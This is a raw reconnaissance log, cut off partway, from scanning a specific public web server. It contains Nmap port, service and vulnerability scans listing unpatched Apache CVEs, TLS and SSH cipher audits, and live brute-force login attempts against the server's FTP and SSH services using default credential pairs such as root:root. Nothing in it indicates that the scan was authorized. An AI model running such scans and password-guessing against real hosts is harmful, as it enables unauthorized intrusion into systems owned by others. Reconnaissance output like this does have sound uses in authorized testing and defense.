6.8 https://vulners.com/cve/CVE-2017-15715 | CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082 | CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788 | CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217 | CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927 | CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098 | CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490 | CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934 | CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081 | CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220 | CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196 | CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199 | CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333 | CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798 | CVE-2017-7659 5.0 https://vulners.com/cve/CVE-2017-7659 | CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710 | CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197 | CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993 | CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092 | CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763 |_ CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283 NSE: Script Post-scanning. Initiating NSE at 00:52 Completed NSE at 00:52, 0.00s elapsed Initiating NSE at 00:52 Completed NSE at 00:52, 0.00s elapsed ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 00:52 EDT NSE: Loaded 49 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 00:52 Completed NSE at 00:52, 0.00s elapsed Initiating NSE at 00:52 Completed NSE at 00:52, 0.00s elapsed Initiating Ping Scan at 00:52 Scanning 212.86.108.165 [4 ports] Completed Ping Scan at 00:52, 0.18s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 00:52 Completed Parallel DNS resolution of 1 host. at 00:52, 0.03s elapsed Initiating SYN Stealth Scan at 00:52 Scanning tinytube.top (212.86.108.165) [1 port] Discovered open port 110/tcp on 212.86.108.165 Completed SYN Stealth Scan at 00:52, 0.17s elapsed (1 total ports) Initiating Service scan at 00:52 Scanning 1 service on tinytube.top (212.86.108.165) Completed Service scan at 00:52, 0.29s elapsed (1 service on 1 host) Initiating OS detection (try #1) against tinytube.top (212.86.108.165) Retrying OS detection (try #2) against tinytube.top (212.86.108.165) Initiating Traceroute at 00:52 Completed Traceroute at 00:52, 3.01s elapsed Initiating Parallel DNS resolution of 9 hosts. at 00:52 Completed Parallel DNS resolution of 9 hosts. at 00:52, 0.04s elapsed NSE: Script scanning 212.86.108.165. Initiating NSE at 00:52 NSE Timing: About 68.66% done; ETC: 00:53 (0:00:30 remaining) Completed NSE at 00:53, 90.77s elapsed Initiating NSE at 00:53 Completed NSE at 00:53, 0.05s elapsed Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.13s latency). PORT STATE SERVICE VERSION 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: USER SASL(PLAIN LOGIN DIGEST-MD5 CRAM-MD5) RESP-CODES PIPELINING STLS CAPA TOP AUTH-RESP-CODE UIDL Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 4.11 (94%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 3.8 - 3.11 (94%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 0.445 days (since Wed Aug 26 14:13:36 2020) Network Distance: 11 hops TCP Sequence Prediction: Difficulty=264 (Good luck!) IP ID Sequence Generation: All zeros TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 32.76 ms 10.203.11.1 2 38.00 ms v131.ce05.wdc-02.us.leaseweb.net (207.244.84.156) 3 38.14 ms edm-019.yelaiyehao.com (173.208.126.20) 4 39.37 ms ash-b1-link.telia.net (62.115.182.174) 5 33.69 ms rest-bb1-link.telia.net (80.91.248.156) 6 ... 7 131.23 ms adm-bb4-link.telia.net (213.155.136.167) 8 132.64 ms adm-b6-link.telia.net (62.115.116.125) 9 132.03 ms novoserve-svc069390-ic354347.c.telia.net (62.115.188.167) 10 ... 11 129.58 ms tinytube.top (212.86.108.165) NSE: Script Post-scanning. Initiating NSE at 00:53 Completed NSE at 00:53, 0.00s elapsed Initiating NSE at 00:53 Completed NSE at 00:53, 0.00s elapsed ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 00:53 EDT NSE: Loaded 48 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 00:53 Completed NSE at 00:53, 0.00s elapsed Initiating NSE at 00:53 Completed NSE at 00:53, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 00:53 Completed Parallel DNS resolution of 1 host. at 00:53, 0.03s elapsed Initiating UDP Scan at 00:53 Scanning tinytube.top (212.86.108.165) [1 port] Discovered open port 123/udp on 212.86.108.165 Completed UDP Scan at 00:53, 0.18s elapsed (1 total ports) Initiating Service scan at 00:53 Scanning 1 service on tinytube.top (212.86.108.165) Completed Service scan at 00:53, 0.13s elapsed (1 service on 1 host) Initiating OS detection (try #1) against tinytube.top (212.86.108.165) Retrying OS detection (try #2) against tinytube.top (212.86.108.165) Initiating Traceroute at 00:53 Completed Traceroute at 00:53, 6.16s elapsed Initiating Parallel DNS resolution of 10 hosts. at 00:53 Completed Parallel DNS resolution of 10 hosts. at 00:54, 1.08s elapsed NSE: Script scanning 212.86.108.165. Initiating NSE at 00:54 Completed NSE at 00:54, 10.37s elapsed Initiating NSE at 00:54 Completed NSE at 00:54, 0.00s elapsed Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.13s latency). PORT STATE SERVICE VERSION 123/udp open ntp NTP v4 (unsynchronized) | ntp-info: |_ receive time stamp: 2036-02-07T06:28:30 Too many fingerprints match this host to give specific OS details Network Distance: 11 hops TRACEROUTE (using port 123/udp) HOP RTT ADDRESS 1 33.45 ms 10.203.11.1 2 37.98 ms v131.ce05.wdc-02.us.leaseweb.net (207.244.84.156) 3 38.02 ms edm-019.yelaiyehao.com (173.208.126.20) 4 39.16 ms ash-b1-link.telia.net (62.115.182.182) 5 39.38 ms ash-bb2-link.telia.net (62.115.143.120) 6 127.41 ms prs-bb3-link.telia.net (62.115.112.243) 7 125.29 ms adm-bb3-link.telia.net (213.155.136.20) 8 128.14 ms adm-b6-link.telia.net (62.115.117.115) 9 127.29 ms novoserve-svc069390-ic354347.c.telia.net (62.115.188.167) 10 132.30 ms Vlanif711.zar-dcd.cust.novoserve.com (89.105.192.233) 11 ... 30 NSE: Script Post-scanning. Initiating NSE at 00:54 Completed NSE at 00:54, 0.00s elapsed Initiating NSE at 00:54 Completed NSE at 00:54, 0.00s elapsed #################################################################################################################################### HTTP/1.1 200 OK Date: Thu, 27 Aug 2020 04:54:11 GMT Server: Apache/2.4.25 (Debian) Strict-Transport-Security: max-age=31536000; preload Content-Type: text/html; charset=UTF-8 #################################################################################################################################### #!/back https://fonts.googleapis.com/css?family=Boogaloo&display=swap http://tds.hdkino.top/M6R18w http://trade.tinytube.top/ text/css text/javascript wx/out.php wx/out.php?link=free_download wx/out.php?link=mpeg_11 wx/out.php?link=mpeg_12 wx/out.php?link=mpeg_13 wx/out.php?link=mpeg_14 wx/out.php?link=mpeg_5 wx/out.php?link=mpeg_7 wx/out.php?link=mpeg_8 ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 00:54 EDT NSE: Loaded 159 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 00:54 Completed NSE at 00:54, 0.00s elapsed Initiating NSE at 00:54 Completed NSE at 00:54, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 00:54 Completed Parallel DNS resolution of 1 host. at 00:54, 0.03s elapsed Initiating SYN Stealth Scan at 00:54 Scanning tinytube.top (212.86.108.165) [1 port] Discovered open port 443/tcp on 212.86.108.165 Completed SYN Stealth Scan at 00:54, 0.17s elapsed (1 total ports) Initiating Service scan at 00:54 Scanning 1 service on tinytube.top (212.86.108.165) Completed Service scan at 00:54, 14.43s elapsed (1 service on 1 host) NSE: Script scanning 212.86.108.165. Initiating NSE at 00:54 Completed NSE at 00:56, 90.73s elapsed Initiating NSE at 00:56 Completed NSE at 00:56, 1.56s elapsed Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.12s latency). PORT STATE SERVICE VERSION 443/tcp open ssl/http Apache httpd 2.4.25 ((Debian)) | http-brute: |_ Path "/" does not require authentication |_http-chrono: Request times for /; avg: 1336.72ms; min: 1175.40ms; max: 1565.92ms |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-date: Thu, 27 Aug 2020 04:54:43 GMT; -2s from local time. |_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number= for deeper analysis) |_http-errors: Couldn't find any error pages. |_http-feed: Couldn't find any feeds. |_http-fetch: Please enter the complete path of the directory to save data in. | http-headers: | Date: Thu, 27 Aug 2020 04:55:08 GMT | Server: Apache/2.4.25 (Debian) | Strict-Transport-Security: max-age=31536000; preload | Connection: close | Content-Type: text/html; charset=UTF-8 | |_ (Request type: HEAD) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-mobileversion-checker: No mobile version detected. | http-php-version: Logo query returned unknown hash 52f37ccde54a94e9d13b6f1e83985ca7 |_Credits query returned unknown hash 5fbf08d5c816c3c13a0cbb7077314245 | http-security-headers: | Strict_Transport_Security: |_ Header: Strict-Transport-Security: max-age=31536000; preload |_http-server-header: Apache/2.4.25 (Debian) | http-sitemap-generator: | Directory structure: | / | Other: 1 | /images/ | png: 1 | Longest directory structure: | Depth: 1 | Dir: /images/ | Total files found (by extension): |_ Other: 1; png: 1 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-title: Cum 4K | http-vhosts: |_127 names had status 200 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) |_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit= for deeper analysis) |_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php |_http-xssed: No previously reported XSS vuln. | vulners: | cpe:/a:apache:http_server:2.4.25: | CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679 | CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668 | CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169 | CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167 | CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211 | CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312 | CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715 | CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082 | CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788 | CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217 | CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927 | CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098 | CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490 | CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934 | CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081 | CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220 | CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196 | CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199 | CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333 | CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798 | CVE-2017-7659 5.0 https://vulners.com/cve/CVE-2017-7659 | CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710 | CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197 | CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993 | CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092 | CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763 |_ CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283 NSE: Script Post-scanning. Initiating NSE at 00:56 Completed NSE at 00:56, 0.00s elapsed Initiating NSE at 00:56 Completed NSE at 00:56, 0.00s elapsed ##################################################################################################################################### Version: 2.0.0-static OpenSSL 1.1.1h-dev xx XXX xxxx Connected to 212.86.108.165 Testing SSL server 212.86.108.165 on port 443 using SNI name 212.86.108.165 SSL/TLS Protocols: SSLv2 disabled SSLv3 disabled TLSv1.0 enabled TLSv1.1 enabled TLSv1.2 enabled TLSv1.3 disabled TLS Fallback SCSV: Server supports TLS Fallback SCSV TLS renegotiation: Secure session renegotiation supported TLS Compression: Compression disabled Heartbleed: TLSv1.2 not vulnerable to heartbleed TLSv1.1 not vulnerable to heartbleed TLSv1.0 not vulnerable to heartbleed Supported Server Cipher(s): Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256 Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256 Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256 Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256 Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.2 256 bits AES256-GCM-SHA384 Accepted TLSv1.2 256 bits AES256-SHA256 Accepted TLSv1.2 256 bits AES256-SHA Accepted TLSv1.2 128 bits AES128-GCM-SHA256 Accepted TLSv1.2 128 bits AES128-SHA256 Accepted TLSv1.2 128 bits AES128-SHA Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.1 256 bits AES256-SHA Accepted TLSv1.1 128 bits AES128-SHA Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.0 256 bits AES256-SHA Accepted TLSv1.0 128 bits AES128-SHA Server Key Exchange Group(s): TLSv1.2 141 bits sect283k1 TLSv1.2 141 bits sect283r1 TLSv1.2 204 bits sect409k1 TLSv1.2 204 bits sect409r1 TLSv1.2 285 bits sect571k1 TLSv1.2 285 bits sect571r1 TLSv1.2 128 bits secp256k1 TLSv1.2 128 bits secp256r1 (NIST P-256) TLSv1.2 192 bits secp384r1 (NIST P-384) TLSv1.2 260 bits secp521r1 (NIST P-521) TLSv1.2 128 bits brainpoolP256r1 TLSv1.2 192 bits brainpoolP384r1 TLSv1.2 256 bits brainpoolP512r1 Server Signature Algorithm(s): TLSv1.2 rsa_pkcs1_sha1 TLSv1.2 dsa_sha1 TLSv1.2 ecdsa_sha1 TLSv1.2 rsa_pkcs1_sha224 TLSv1.2 dsa_sha224 TLSv1.2 ecdsa_sha224 TLSv1.2 rsa_pkcs1_sha256 TLSv1.2 dsa_sha256 TLSv1.2 ecdsa_secp256r1_sha256 TLSv1.2 rsa_pkcs1_sha384 TLSv1.2 dsa_sha384 TLSv1.2 ecdsa_secp384r1_sha384 TLSv1.2 rsa_pkcs1_sha512 TLSv1.2 dsa_sha512 TLSv1.2 ecdsa_secp521r1_sha512 SSL Certificate: Signature Algorithm: sha256WithRSAEncryption RSA Key Strength: 2048 Subject: cum4k.xyz Issuer: cum4k.xyz Not valid before: Dec 29 16:48:29 2019 GMT Not valid after: Dec 28 16:48:29 2020 GMT ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 07:26 EDT Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.24s latency). Not shown: 464 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5b | ssl-cert: Subject: commonName=example.com/organizationName=XX/stateOrProvinceName=XX/countryName=XX | Not valid before: 2019-12-10T14:57:15 |_Not valid after: 2029-12-07T14:57:15 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0) | ssh-hostkey: | 2048 89:e2:fc:31:f3:d0:4d:b0:17:85:f9:83:ef:c3:cf:a4 (RSA) | 256 a9:72:e2:82:ba:05:fc:44:19:1d:9a:c3:15:c0:89:28 (ECDSA) |_ 256 3a:ca:80:35:34:89:6f:e5:f0:40:a3:10:e5:95:be:f7 (ED25519) 25/tcp open smtp Exim smtpd 4.89 | smtp-commands: tinytube.top Hello tinytube.top [185.242.5.119], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN CRAM-MD5, STARTTLS, HELP, |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP | ssl-cert: Subject: commonName=tinytube/organizationName=XX/stateOrProvinceName=XX/countryName=XX | Not valid before: 2019-12-10T14:54:54 |_Not valid after: 2029-12-07T14:54:54 |_ssl-date: 2020-08-27T11:26:45+00:00; -54s from scanner time. 53/tcp open domain ISC BIND 9.10.3-P4 (Debian Linux) | dns-nsid: |_ bind.version: 9.10.3-P4-Debian 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Tiny Tube 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: UIDL TOP AUTH-RESP-CODE STLS CAPA SASL(PLAIN LOGIN DIGEST-MD5 CRAM-MD5) USER RESP-CODES PIPELINING |_ssl-date: TLS randomness does not represent time 143/tcp open imap Dovecot imapd |_imap-capabilities: STARTTLS OK AUTH=LOGIN IDLE post-login AUTH=PLAIN capabilities more have listed AUTH=CRAM-MD5A0001 AUTH=DIGEST-MD5 LITERAL+ Pre-login SASL-IR IMAP4rev1 LOGIN-REFERRALS ID ENABLE |_ssl-date: TLS randomness does not represent time 443/tcp open ssl/http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Cum 4K | ssl-cert: Subject: commonName=cum4k.xyz/organizationName=XX/stateOrProvinceName=XX/countryName=XX | Not valid before: 2019-12-29T16:48:29 |_Not valid after: 2020-12-28T16:48:29 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 465/tcp open ssl/smtp Exim smtpd 4.89 | smtp-commands: tinytube.top Hello tinytube.top [185.242.5.119], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN CRAM-MD5, HELP, |_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP | ssl-cert: Subject: commonName=tinytube/organizationName=XX/stateOrProvinceName=XX/countryName=XX | Not valid before: 2019-12-10T14:54:54 |_Not valid after: 2029-12-07T14:54:54 |_ssl-date: 2020-08-27T11:25:44+00:00; -1m54s from scanner time. 587/tcp open smtp Exim smtpd 4.89 | smtp-commands: tinytube.top Hello tinytube.top [185.242.5.119], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN CRAM-MD5, STARTTLS, HELP, |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP | ssl-cert: Subject: commonName=tinytube/organizationName=XX/stateOrProvinceName=XX/countryName=XX | Not valid before: 2019-12-10T14:54:54 |_Not valid after: 2029-12-07T14:54:54 |_ssl-date: 2020-08-27T11:26:18+00:00; -1m22s from scanner time. 993/tcp open ssl/imaps? |_ssl-date: TLS randomness does not represent time 995/tcp open ssl/pop3s? |_ssl-date: TLS randomness does not represent time Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.10 - 4.11 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 4.2 (94%), Linux 4.4 (94%), Linux 3.18 (93%), HP P2000 G3 NAS device (93%), Linux 3.2 - 4.9 (93%), Linux 3.16 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 9 hops Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -1m23s, deviation: 30s, median: -1m22s TRACEROUTE (using port 993/tcp) HOP RTT ADDRESS 1 90.83 ms 10.203.4.1 2 92.01 ms vlan119.as16.lax1.us.m247.com (185.242.5.113) 3 ... 4 90.88 ms xe-2-3-0-0.bb2.lax1.us.m247.com (193.9.115.198) 5 91.03 ms las-b24-link.telia.net (80.239.130.168) 6 240.15 ms ae-2-3204.edge7.Amsterdam1.Level3.net (4.69.162.181) 7 238.87 ms prs-bb3-link.telia.net (62.115.112.243) 8 ... 9 241.69 ms tinytube.top (212.86.108.165) ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 07:29 EDT Warning: 212.86.108.165 giving up on port because retransmission cap hit (2). Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.24s latency). Not shown: 21 closed ports PORT STATE SERVICE VERSION 53/tcp open domain ISC BIND 9.10.3-P4 (Debian Linux) 53/udp open domain ISC BIND 9.10.3-P4 (Debian Linux) | dns-nsid: |_ bind.version: 9.10.3-P4-Debian 68/udp open|filtered dhcpc 69/udp open|filtered tftp 88/udp open|filtered kerberos-sec 123/udp open ntp NTP v4 (secondary server) | ntp-info: |_ 162/udp open|filtered snmptrap Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.10 - 4.11 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 4.2 (94%), Linux 4.4 (94%), Linux 3.18 (93%), HP P2000 G3 NAS device (93%), Linux 3.16 (93%), Linux 3.2 - 4.9 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 11 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: 7s TRACEROUTE (using port 53/tcp) HOP RTT ADDRESS 1 91.80 ms 10.203.4.1 2 92.22 ms vlan119.as16.lax1.us.m247.com (185.242.5.113) 3 ... 4 88.21 ms 37.120.220.198 5 88.73 ms las-b21-link.telia.net (195.12.254.138) 6 145.07 ms ash-bb2-link.telia.net (62.115.121.221) 7 236.68 ms NOVOSERVE-B.edge7.Amsterdam1.Level3.net (213.19.200.70) 8 ... 9 233.11 ms adm-b6-link.telia.net (62.115.117.115) 10 239.05 ms novoserve-svc069390-ic354347.c.telia.net (62.115.188.167) 11 235.86 ms tinytube.top (212.86.108.165) ####################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 07:31 EDT NSE: [ftp-brute] usernames: Time limit 3m00s exceeded. NSE: [ftp-brute] usernames: Time limit 3m00s exceeded. NSE: [ftp-brute] passwords: Time limit 3m00s exceeded. Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.24s latency). PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5b | ftp-brute: | Accounts: No valid accounts found |_ Statistics: Performed 2962 guesses in 180 seconds, average tps: 16.3 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 4.11 (94%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 3.16 (94%) No exact OS matches for host (test conditions non-ideal). Network Distance: 12 hops Service Info: OS: Unix TRACEROUTE (using port 21/tcp) HOP RTT ADDRESS 1 87.51 ms 10.203.4.1 2 88.69 ms vlan119.as16.lax1.us.m247.com (185.242.5.113) 3 ... 4 93.71 ms te-1-2-0.bb1.nyc1.us.m247.com (77.243.185.18) 5 93.07 ms las-b24-link.telia.net (80.239.130.168) 6 ... 8 9 236.35 ms adm-b6-link.telia.net (62.115.117.115) 10 233.95 ms novoserve-svc069390-ic354347.c.telia.net (62.115.188.167) 11 ... 12 243.40 ms tinytube.top (212.86.108.165) ##################################################################################################################################### # general (gen) banner: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7 (gen) software: OpenSSH 7.4p1 (gen) compatibility: OpenSSH 7.3+, Dropbear SSH 2016.73+ (gen) compression: enabled (zlib@openssh.com) # key exchange algorithms (kex) curve25519-sha256 -- [warn] unknown algorithm (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak) `- [info] available since OpenSSH 4.4 (kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73 (kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3 (kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73 (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53 # host-key algorithms (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28 (key) rsa-sha2-512 -- [info] available since OpenSSH 7.2 (key) rsa-sha2-256 -- [info] available since OpenSSH 7.2 (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves `- [warn] using weak random number generator could reveal the key `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (key) ssh-ed25519 -- [info] available since OpenSSH 6.5 # encryption algorithms (ciphers) (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5 `- [info] default cipher since OpenSSH 6.9. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52 (enc) aes192-ctr -- [info] available since OpenSSH 3.7 (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52 (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2 (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2 # message authentication code algorithms (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size `- [info] available since OpenSSH 6.2 (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2 (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2 (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2 (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm `- [info] available since OpenSSH 6.2 (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode `- [warn] using small 64-bit tag size `- [info] available since OpenSSH 4.7 (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 6.2 (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56 (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56 (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode `- [warn] using weak hashing algorithm `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28 # algorithm recommendations (for OpenSSH 7.4) (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove (rec) -hmac-sha2-512 -- mac algorithm to remove (rec) -umac-128@openssh.com -- mac algorithm to remove (rec) -hmac-sha2-256 -- mac algorithm to remove (rec) -umac-64@openssh.com -- mac algorithm to remove (rec) -hmac-sha1 -- mac algorithm to remove (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove (rec) -umac-64-etm@openssh.com -- mac algorithm to remove ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 07:34 EDT NSE: [ssh-run] Failed to specify credentials and command to run. NSE: [ssh-brute] Trying username/password pair: root:root NSE: [ssh-brute] Trying username/password pair: admin:admin NSE: [ssh-brute] Trying username/password pair: administrator:administrator NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin NSE: [ssh-brute] Trying username/password pair: guest:guest NSE: [ssh-brute] Trying username/password pair: user:user NSE: [ssh-brute] Trying username/password pair: web:web NSE: [ssh-brute] Trying username/password pair: test:test NSE: [ssh-brute] Trying username/password pair: root: NSE: [ssh-brute] Trying username/password pair: admin: NSE: [ssh-brute] Trying username/password pair: administrator: NSE: [ssh-brute] Trying username/password pair: webadmin: NSE: [ssh-brute] Trying username/password pair: sysadmin: NSE: [ssh-brute] Trying username/password pair: netadmin: 